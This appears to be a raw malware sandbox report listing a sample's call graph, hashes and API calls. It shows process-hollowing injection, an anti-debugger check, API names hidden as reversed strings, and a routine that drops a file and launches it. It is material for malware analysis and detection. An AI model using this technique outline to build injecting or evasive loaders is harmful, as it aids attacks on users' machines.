28855->28856 28857 2f38274 GetProcAddress 28856->28857 28858 2f38a36 28857->28858 28859 2f37d78 3 API calls 28858->28859 28860 2f38a95 28859->28860 28861 2f38338 3 API calls 28860->28861 28862 2f38aa4 28861->28862 28862->27762 28864 2f3f759 28863->28864 28865 2f3f786 28864->28865 28866 2f3f774 CheckRemoteDebuggerPresent 28864->28866 28865->27788 28866->28865 28868 2f24871 28867->28868 28870 2f38d78 28869->28870 28871 2f389d0 4 API calls 28870->28871 28872 2f38dfb 28871->28872 28873 2f389d0 4 API calls 28872->28873 28874 2f38e54 28873->28874 28875 2f3a8b7 28874->28875 28876 2f389d0 4 API calls 28874->28876 28875->28506 28877 2f38ec5 28876->28877 28878 2f389d0 4 API calls 28877->28878 28879 2f38f1e 28878->28879 28879->28875 28880 2f389d0 4 API calls 28879->28880 28881 2f38fa6 28880->28881 28882 2f389d0 4 API calls 28881->28882 28883 2f38fff 28882->28883 28884 2f389d0 4 API calls 28883->28884 28885 2f39084 28884->28885 28886 2f389d0 4 API calls 28885->28886 28887 2f390e3 28886->28887 28888 2f389d0 4 API calls 28887->28888 28889 2f39154 28888->28889 28890 2f389d0 4 API calls 28889->28890 28891 2f391c5 28890->28891 28892 2f389d0 4 API calls 28891->28892 28893 2f39236 28892->28893 29061 2f38788 28893->29061 28895 2f39273 28896 2f392e8 28895->28896 28898 2f389d0 4 API calls 28895->28898 28897 2f389d0 4 API calls 28896->28897 28899 2f39359 28897->28899 28898->28896 28900 2f389d0 4 API calls 28899->28900 28901 2f3938c 28900->28901 28902 2f389d0 4 API calls 28901->28902 28903 2f393fd 28902->28903 28904 2f389d0 4 API calls 28903->28904 28905 2f3946e 28904->28905 28906 2f389d0 4 API calls 28905->28906 28907 2f3950b 28906->28907 28908 2f389d0 4 API calls 28907->28908 28909 2f3957c 28908->28909 28910 2f389d0 4 API calls 28909->28910 28911 2f395ed 28910->28911 28911->28875 28912 2f389d0 4 API calls 28911->28912 28913 2f39680 28912->28913 28914 2f389d0 4 API calls 28913->28914 28915 2f396f1 28914->28915 28916 2f389d0 4 API calls 28915->28916 28917 2f39762 28916->28917 28918 2f389d0 4 API calls 28917->28918 28919 2f397d3 28918->28919 28920 2f389d0 4 API calls 28919->28920 28921 2f39844 28920->28921 29068 2f38400 28921->29068 28923 2f39864 28924 2f39b7f 28923->28924 28925 2f39878 28923->28925 28926 2f389d0 4 API calls 28924->28926 28927 2f389d0 4 API calls 28925->28927 28929 2f39b78 28926->28929 28928 2f398e9 28927->28928 28931 2f389d0 4 API calls 28928->28931 28930 2f389d0 4 API calls 28929->28930 28933 2f39c61 28930->28933 28932 2f3995a 28931->28932 28934 2f389d0 4 API calls 28932->28934 28935 2f389d0 4 API calls 28933->28935 28936 2f399cb 28934->28936 28941 2f39cd2 28935->28941 29075 2f38670 28936->29075 28938 2f399df 28939 2f399e3 28938->28939 28944 2f39a0b 28938->28944 28940 2f37a2c 3 API calls 28939->28940 28947 2f39a04 28940->28947 28942 2f389d0 4 API calls 28941->28942 28943 2f39d43 28942->28943 28945 2f37a2c 3 API calls 28943->28945 28946 2f389d0 4 API calls 28944->28946 28949 2f39d64 28945->28949 28946->28947 28948 2f389d0 4 API calls 28947->28948 28951 2f39aed 28948->28951 28949->28875 28950 2f389d0 4 API calls 28949->28950 28955 2f39de7 28950->28955 28952 2f389d0 4 API calls 28951->28952 28953 2f39b5e 28952->28953 29082 2f37a2c 28953->29082 28956 2f389d0 4 API calls 28955->28956 28957 2f39e58 28956->28957 28958 2f389d0 4 API calls 28957->28958 28959 2f39f34 28958->28959 28960 2f389d0 4 API calls 28959->28960 28961 2f39fa5 28960->28961 28962 2f389d0 4 API calls 28961->28962 28963 2f3a016 28962->28963 28964 2f37d78 3 API calls 28963->28964 28965 2f3a033 28964->28965 28966 2f389d0 4 API calls 28965->28966 28967 2f3a0a4 28966->28967 28968 2f389d0 4 API calls 28967->28968 28969 2f3a115 28968->28969 28970 2f389d0 4 API calls 28969->28970 28971 2f3a186 28970->28971 28972 2f37d78 3 API calls 28971->28972 28973 2f3a1a6 28972->28973 28974 2f389d0 4 API calls 28973->28974 28975 2f3a217 28974->28975 28976 2f389d0 4 API calls 28975->28976 28977 2f3a288 28976->28977 28978 2f389d0 4 API calls 28977->28978 28979 2f3a2f9 28978->28979 28980 2f389d0 4 API calls 28979->28980 28981 2f3a39a 28980->28981 28982 2f389d0 4 API calls 28981->28982 28983 2f3a40b 28982->28983 28984 2f389d0 4 API calls 28983->28984 28985 2f3a47c 28984->28985 28986 2f389d0 4 API calls 28985->28986 28987 2f3a4ed 28986->28987 28988 2f389d0 4 API calls 28987->28988 28989 2f3a573 28988->28989 28990 2f3894c 3 API calls 28989->28990 28991 2f3a587 28990->28991 28992 2f3894c 3 API calls 28991->28992 28993 2f3a59b 28992->28993 28994 2f3894c 3 API calls 28993->28994 28995 2f3a5af 28994->28995 28996 2f389d0 4 API calls 28995->28996 28997 2f3a620 28996->28997 28998 2f3894c 3 API calls 28997->28998 28999 2f3a634 28998->28999 29000 2f3894c 3 API calls 28999->29000 29001 2f3a648 29000->29001 29002 2f3894c 3 API calls 29001->29002 29003 2f3a69a 29002->29003 29004 2f3894c 3 API calls 29003->29004 29005 2f3a6ec 29004->29005 29006 2f3894c 3 API calls 29005->29006 29007 2f3a700 29006->29007 29008 2f3894c 3 API calls 29007->29008 29009 2f3a714 29008->29009 29010 2f3894c 3 API calls 29009->29010 29011 2f3a728 29010->29011 29012 2f3894c 3 API calls 29011->29012 29013 2f3a73c 29012->29013 29014 2f3894c 3 API calls 29013->29014 29015 2f3a78e 29014->29015 29016 2f3894c 3 API calls 29015->29016 29017 2f3a7e0 29016->29017 29018 2f3894c 3 API calls 29017->29018 29019 2f3a832 29018->29019 29020 2f3894c 3 API calls 29019->29020 29021 2f3a884 29020->29021 29022 2f3894c 3 API calls 29021->29022 29023 2f3a8a3 29022->29023 29024 2f3894c 3 API calls 29023->29024 29024->28875 29025->28409 29027 2f246da 29026->29027 29028->28535 29029->28468 29030->28601 29031->28653 29032->28579 29033->28628 29035 2f38965 29034->29035 29036 2f37d78 3 API calls 29035->29036 29037 2f389a5 29035->29037 29036->29037 29037->28727 29039 2f3835b 29038->29039 29040 2f381cc 2 API calls 29039->29040 29041 2f3838d 29040->29041 29042 2f38274 GetProcAddress 29041->29042 29043 2f38393 FlushInstructionCache 29042->29043 29044 2f383c1 29043->29044 29044->28841 29046 2f38299 29045->29046 29047 2f382cc GetProcAddress 29046->29047 29048 2f382fb 29047->29048 29048->28850 29050 2f37d9d 29049->29050 29056 2f381cc 29050->29056 29052 2f37dcd 29053 2f38274 GetProcAddress 29052->29053 29054 2f37dd3 NtWriteVirtualMemory 29053->29054 29055 2f37e0c 29054->29055 29055->28852 29057 2f381ef 29056->29057 29058 2f38274 GetProcAddress 29057->29058 29059 2f38215 GetModuleHandleA 29058->29059 29060 2f3823b 29059->29060 29060->29052 29062 2f387ab 29061->29062 29063 2f381cc 2 API calls 29062->29063 29064 2f387dd 29063->29064 29065 2f38274 GetProcAddress 29064->29065 29066 2f387e3 CreateProcessAsUserW 29065->29066 29067 2f3882f 29066->29067 29067->28895 29069 2f38425 29068->29069 29070 2f381cc 2 API calls 29069->29070 29071 2f38452 29070->29071 29072 2f38274 GetProcAddress 29071->29072 29073 2f38458 NtReadVirtualMemory 29072->29073 29074 2f38493 29073->29074 29074->28923 29076 2f38695 29075->29076 29077 2f381cc 2 API calls 29076->29077 29078 2f386c2 29077->29078 29079 2f38274 GetProcAddress 29078->29079 29080 2f386c8 NtUnmapViewOfSection 29079->29080 29081 2f386f5 29080->29081 29081->28938 29083 2f37a51 29082->29083 29084 2f381cc 2 API calls 29083->29084 29085 2f37a7e 29084->29085 29086 2f38274 GetProcAddress 29085->29086 29087 2f37a84 NtAllocateVirtualMemory 29086->29087 29088 2f37ac2 29087->29088 29088->28929

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                                • Part of subcall function 02F381CC: GetModuleHandleA.KERNELBASE(?), ref: 02F3821E
                                                                                                                • Part of subcall function 02F38274: GetProcAddress.KERNEL32(?,?), ref: 02F382D9
                                                                                                              • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02F37A9F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001A.00000002.1607888941.0000000002F21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_26_2_2f21000_Wisrysxl.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                              • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                              • API String ID: 421316089-445027087
                                                                                                              • Opcode ID: 6884cb6e36c087edc9bf99628b05b4a57a5e8b5fbc94ce3d06045e707ae77055
                                                                                                              • Instruction ID: 47e98d4e1aac86b5c4563eba46537cead4d23d687d5e355dad791ba17e3dd05d
                                                                                                              • Opcode Fuzzy Hash: 6884cb6e36c087edc9bf99628b05b4a57a5e8b5fbc94ce3d06045e707ae77055
                                                                                                              • Instruction Fuzzy Hash: 621157B5640208BFEB01EFA4DC91EAEF7EEEB49780F514460FA00D7200D674EA048F20

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                                • Part of subcall function 02F381CC: GetModuleHandleA.KERNELBASE(?), ref: 02F3821E
                                                                                                                • Part of subcall function 02F38274: GetProcAddress.KERNEL32(?,?), ref: 02F382D9
                                                                                                              • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02F37A9F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001A.00000002.1607888941.0000000002F21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_26_2_2f21000_Wisrysxl.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                              • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                              • API String ID: 421316089-445027087
                                                                                                              • Opcode ID: 5d9c0843a8df1351729a99774420b63b7f54d48bf53e0e4bd13fb4fc006abd53
                                                                                                              • Instruction ID: 23fd59a9d2de1e73cfff21e5b69ebdb96e0a96945ceb5076d180348181cfd7d7
                                                                                                              • Opcode Fuzzy Hash: 5d9c0843a8df1351729a99774420b63b7f54d48bf53e0e4bd13fb4fc006abd53
                                                                                                              • Instruction Fuzzy Hash: A51157B5640208BFEB01EFA4DC91E9EF7AEEB49780F514460FA00D7200D674EA048F20

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                                • Part of subcall function 02F381CC: GetModuleHandleA.KERNELBASE(?), ref: 02F3821E
                                                                                                                • Part of subcall function 02F38274: GetProcAddress.KERNEL32(?,?), ref: 02F382D9
                                                                                                              • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02F38471
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001A.00000002.1607888941.0000000002F21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_26_2_2f21000_Wisrysxl.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleMemoryModuleProcReadVirtual
                                                                                                              • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                              • API String ID: 2004920654-737317276
                                                                                                              • Opcode ID: 02dfff808805719fd38402e89fcbcc91a78756247c96d8cb4ca1d2cd267019ee
                                                                                                              • Instruction ID: 9d38635bac0dbbee847ca032a9db086d7a7327ab328b5fda71dd51b7964c62f2
                                                                                                              • Opcode Fuzzy Hash: 02dfff808805719fd38402e89fcbcc91a78756247c96d8cb4ca1d2cd267019ee
                                                                                                              • Instruction Fuzzy Hash: A701E9B5640308AFEB01EFA8DC51E9EB7EEEB4D790F514460FA04D7640D678EA148B24

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                                • Part of subcall function 02F381CC: GetModuleHandleA.KERNELBASE(?), ref: 02F3821E
                                                                                                                • Part of subcall function 02F38274: GetProcAddress.KERNEL32(?,?), ref: 02F382D9
                                                                                                              • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02F37DEC
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001A.00000002.1607888941.0000000002F21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_26_2_2f21000_Wisrysxl.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleMemoryModuleProcVirtualWrite
                                                                                                              • String ID: Ntdll$yromeMlautriVetirW
                                                                                                              • API String ID: 4260932595-3542721025
                                                                                                              • Opcode ID: 10285fa49e0c7ce3744db36a83393d9aa80e3c91a7ca099778f01658196b5545
                                                                                                              • Instruction ID: 2b6f31e2904baec69d7381eb4e59c45d6d2728195816e57c9943919a47eccec8
                                                                                                              • Opcode Fuzzy Hash: 10285fa49e0c7ce3744db36a83393d9aa80e3c91a7ca099778f01658196b5545
                                                                                                              • Instruction Fuzzy Hash: C9018CB6640208AFEB02FF99DC42E9EF7EDEB4A780F514850BA04DB600C674ED108F60

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                                • Part of subcall function 02F381CC: GetModuleHandleA.KERNELBASE(?), ref: 02F3821E
                                                                                                                • Part of subcall function 02F38274: GetProcAddress.KERNEL32(?,?), ref: 02F382D9
                                                                                                              • NtUnmapViewOfSection.NTDLL(?,?), ref: 02F386D5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001A.00000002.1607888941.0000000002F21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_26_2_2f21000_Wisrysxl.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProcSectionUnmapView
                                                                                                              • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                              • API String ID: 2801472262-2520021413
                                                                                                              • Opcode ID: 9d0c61717940cb50759f12d9247140d718725f98b12e471a1ad6df61a1ed80da
                                                                                                              • Instruction ID: e176a1c9e2db3ae29517cea3ebc9acb8403622302810ecfb81b36a9796869b4d
                                                                                                              • Opcode Fuzzy Hash: 9d0c61717940cb50759f12d9247140d718725f98b12e471a1ad6df61a1ed80da
                                                                                                              • Instruction Fuzzy Hash: B401FF75A40308BFEB05FBA5DC51E5EF7AEEB49BC0F514460B600D7640D678E9048E24

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 11157 2f37ac9 11158 2f37a56 11157->11158 11159 2f37a52-2f37a54 11158->11159 11160 2f37a58-2f37ac2 call 2f3798c call 2f247ec call 2f249a0 call 2f381cc call 2f38274 NtAllocateVirtualMemory call 2f24500 11158->11160 11159->11158
                                                                                                              APIs
                                                                                                              • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02F37A9F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001A.00000002.1607888941.0000000002F21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_26_2_2f21000_Wisrysxl.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                              • String ID: ntdll
                                                                                                              • API String ID: 2167126740-3337577438
                                                                                                              • Opcode ID: 2936b0ef33a8c13b8702b9db8ad8ea1e94523d54de71eabacbc7f2e7ebf17f88
                                                                                                              • Instruction ID: cbafb02c603cb2427f9e3635a044182a8cb542a5cd8c3fc844538fbcda93b7aa
                                                                                                              • Opcode Fuzzy Hash: 2936b0ef33a8c13b8702b9db8ad8ea1e94523d54de71eabacbc7f2e7ebf17f88
                                                                                                              • Instruction Fuzzy Hash: F701E8B5640209AFEB05EFA4DC81EAEB7EDEB49790F414465BA05D7200D634EA048B24
                                                                                                              APIs
                                                                                                                • Part of subcall function 02F381CC: GetModuleHandleA.KERNELBASE(?), ref: 02F3821E
                                                                                                                • Part of subcall function 02F38274: GetProcAddress.KERNEL32(?,?), ref: 02F382D9
                                                                                                              • NtUnmapViewOfSection.NTDLL(?,?), ref: 02F386D5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001A.00000002.1607888941.0000000002F21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_26_2_2f21000_Wisrysxl.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProcSectionUnmapView
                                                                                                              • String ID: ntdll
                                                                                                              • API String ID: 2801472262-3337577438
                                                                                                              • Opcode ID: a3fcb2b0cedbb2e5ce44af57279226a37b4d894479fe92a1b55e4612b9208b02
                                                                                                              • Instruction ID: 87c22f291969b90a5e1ee38a81a8e77ca422af00fb29d009d43a28c04851bbed
                                                                                                              • Opcode Fuzzy Hash: a3fcb2b0cedbb2e5ce44af57279226a37b4d894479fe92a1b55e4612b9208b02
                                                                                                              • Instruction Fuzzy Hash: 51F04975A44208AFEB02FBB4EC4199DFBFAEF897C0B5145A1B64497201DA38AA048F10

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                                • Part of subcall function 02F381CC: GetModuleHandleA.KERNELBASE(?), ref: 02F3821E
                                                                                                                • Part of subcall function 02F38274: GetProcAddress.KERNEL32(?,?), ref: 02F382D9
                                                                                                              • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02F38814
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001A.00000002.1607888941.0000000002F21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_26_2_2f21000_Wisrysxl.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressCreateHandleModuleProcProcessUser
                                                                                                              • String ID: CreateProcessAsUserW$Kernel32
                                                                                                              • API String ID: 4105707577-2353454454
                                                                                                              • Opcode ID: 4ff71e5a55c9ef60e776f5d80dd1bd842e8785bffa371fd6f21a4a4728d9c129
                                                                                                              • Instruction ID: c95d5d7f72bccd16d79caa8924766c77eea53b5a5033ba7a4b350f5f4f1eedd0
                                                                                                              • Opcode Fuzzy Hash: 4ff71e5a55c9ef60e776f5d80dd1bd842e8785bffa371fd6f21a4a4728d9c129
                                                                                                              • Instruction Fuzzy Hash: 7D11A5B2650248AFEB41EFA9DC41F9E77EDEB4D780F514450BA08D7640C678ED108B65

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 11077 2f3f744-2f3f75e call 2f2668c 11080 2f3f760-2f3f772 call 2f26694 11077->11080 11081 2f3f78a-2f3f792 11077->11081 11080->11081 11084 2f3f774-2f3f784 CheckRemoteDebuggerPresent 11080->11084 11084->11081 11085 2f3f786 11084->11085 11085->11081
                                                                                                              APIs
                                                                                                              • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02F3F77D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001A.00000002.1607888941.0000000002F21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_26_2_2f21000_Wisrysxl.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CheckDebuggerPresentRemote
                                                                                                              • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                              • API String ID: 3662101638-539270669
                                                                                                              • Opcode ID: 02578e57b48446376d142e0514c0b2f12948771d392ca0ca2a420d968fd71206
                                                                                                              • Instruction ID: d7bae1020e426d6368b9bfecb0ae314422665b8d785bb1ccb5f54e5ca273087d
                                                                                                              • Opcode Fuzzy Hash: 02578e57b48446376d142e0514c0b2f12948771d392ca0ca2a420d968fd71206
                                                                                                              • Instruction Fuzzy Hash: 52F0E570D0425CFAEB12A7F88C897DDFFB99B09368F2443D0E635A25C1E7714684CA91
                                                                                                              APIs
                                                                                                                • Part of subcall function 02F381CC: GetModuleHandleA.KERNELBASE(?), ref: 02F3821E
                                                                                                                • Part of subcall function 02F38274: GetProcAddress.KERNEL32(?,?), ref: 02F382D9
                                                                                                              • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02F383C2), ref: 02F383A4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001A.00000002.1607888941.0000000002F21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_26_2_2f21000_Wisrysxl.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressCacheFlushHandleInstructionModuleProc
                                                                                                              • String ID: FlushInstructionCache$Kernel32
                                                                                                              • API String ID: 2392256011-184458249
                                                                                                              • Opcode ID: 628ddb5c1d0ec1febae2c7595146df114c118e9453149f65552db6a88ddaa1ab
                                                                                                              • Instruction ID: e9d48cd8ad3f02b30763b0d0bd10dabba7c33eb949c1db4b1d3a68439eda5d77
                                                                                                              • Opcode Fuzzy Hash: 628ddb5c1d0ec1febae2c7595146df114c118e9453149f65552db6a88ddaa1ab
                                                                                                              • Instruction Fuzzy Hash: D6014B71654308AFE701EEA5DC41F5EB7ADEB09BC0F514460BA00D6640D6B8AE148A24
                                                                                                              APIs
                                                                                                              • GetProcAddress.KERNEL32(?,?), ref: 02F382D9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001A.00000002.1607888941.0000000002F21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_26_2_2f21000_Wisrysxl.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc
                                                                                                              • String ID: Kernel32$sserddAcorPteG
                                                                                                              • API String ID: 190572456-1372893251
                                                                                                              • Opcode ID: 88bc6477f1cf7e476710751fddc5ec80d0174311b2cbd06965c0cd7938cdb0fd
                                                                                                              • Instruction ID: 0766c4bfd0c027aabb67e0a65534d087661c543bb5953b1ee0b3c570f89b704d
                                                                                                              • Opcode Fuzzy Hash: 88bc6477f1cf7e476710751fddc5ec80d0174311b2cbd06965c0cd7938cdb0fd
                                                                                                              • Instruction Fuzzy Hash: 1D01FFB5640318AFEB05FBA4DC51E9EFBEEEB49B90F514460BA00DB740D6B4A904CE64
                                                                                                              APIs
                                                                                                                • Part of subcall function 02F38274: GetProcAddress.KERNEL32(?,?), ref: 02F382D9
                                                                                                              • GetModuleHandleA.KERNELBASE(?), ref: 02F3821E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001A.00000002.1607888941.0000000002F21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_26_2_2f21000_Wisrysxl.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                              • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                              • API String ID: 1646373207-1952140341
                                                                                                              • Opcode ID: 077ce40d23137a721d3f10e244ac5a1330ce82d4a546887994d3c79ccfe63eb5
                                                                                                              • Instruction ID: 9c26d4d7ffd4e529d1aa3efc701dc5c2ecf445a9ae8a28ea108d7c18d9589a6b
                                                                                                              • Opcode Fuzzy Hash: 077ce40d23137a721d3f10e244ac5a1330ce82d4a546887994d3c79ccfe63eb5
                                                                                                              • Instruction Fuzzy Hash: C7F04FB1A44704AFE702FBA4DC11D5EF7EDF74A7C07524460BA0097610D674EE148924

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:25%
                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:36
                                                                                                              Total number of Limit Nodes:2
                                                                                                              execution_graph 247 401000 malloc 248 401031 247->248 267 401453 _XcptFilter 249 401475 memset 250 58c000 249->250 251 4014a2 __set_app_type _controlfp __getmainargs 250->251 254 4013ff 251->254 253 401518 exit 255 40141a 254->255 258 40108c memset memset 255->258 257 401443 257->253 259 401141 258->259 260 40134e 259->260 261 401164 strcmp 259->261 260->257 262 401191 EntryPoint strcpy 261->262 263 4011db EntryPoint getenv EntryPoint sprintf 261->263 264 40126b fopen EntryPoint fwrite fclose 262->264 263->264 265 401310 EntryPoint ShellExecuteA 264->265 266 401349 264->266 265->266 266->257 268 401155 269 401141 268->269 270 401164 strcmp 268->270 269->270 271 40134e 269->271 272 401191 EntryPoint strcpy 270->272 273 4011db EntryPoint getenv EntryPoint sprintf 270->273 274 40126b fopen EntryPoint fwrite fclose 272->274 273->274 275 401310 EntryPoint ShellExecuteA 274->275 276 401349 274->276 275->276 282 401526 _controlfp 283 40108c 15 API calls 282->283 284 401580 283->284 277 4015d7 SetUnhandledExceptionFilter 278 4bf794 279 4bf7a0 278->279 279->278 280 4bf8b4 GetPEB 279->280 281 4bf7e1 279->281

                                                                                                              Callgraph

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000001.1579201485.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 0000001C.00000001.1579201485.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000001.1579201485.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_1_400000_lxsyrsiW.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EntryPoint$memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                              • String ID: %s\%s
                                                                                                              • API String ID: 2742963760-4073750446
                                                                                                              • Opcode ID: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
                                                                                                              • Instruction ID: 7e0938a0f735226449982c757e1a15bee8303af7c1bff0ef3dea70518ca31291
                                                                                                              • Opcode Fuzzy Hash: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
                                                                                                              • Instruction Fuzzy Hash: 9971F4F1E001049BDB54DB9CDC81B9E77B9DB48309F04417AF60AFB391E639AA448B59

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000001.1579201485.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 0000001C.00000001.1579201485.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000001.1579201485.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_1_400000_lxsyrsiW.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EntryPoint$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 2992075992-0
                                                                                                              • Opcode ID: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
                                                                                                              • Instruction ID: da6ba3fb88c20024e61c29d0d1421e634aa01f37861d58f563f893074dd25450
                                                                                                              • Opcode Fuzzy Hash: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
                                                                                                              • Instruction Fuzzy Hash: F54135F0E101049BDB58DB58DC91B9D77B9DB44309F0441BAF60AFB391E63CAA88CB59

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000001.1579201485.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 0000001C.00000001.1579201485.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000001.1579201485.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_1_400000_lxsyrsiW.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __getmainargs__set_app_type_controlfpexitmemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 1611591150-0
                                                                                                              • Opcode ID: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
                                                                                                              • Instruction ID: 9bdd3bf799432f41f787d58fcaaf5403f241b1bf87296188f28308fcf3b5ab6f
                                                                                                              • Opcode Fuzzy Hash: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
                                                                                                              • Instruction Fuzzy Hash: CA110CF5E00104AFCB01EBB8EC85F4A77ACA74C304F50447AB909E7361E979EA448769

                                                                                                              Control-flow Graph

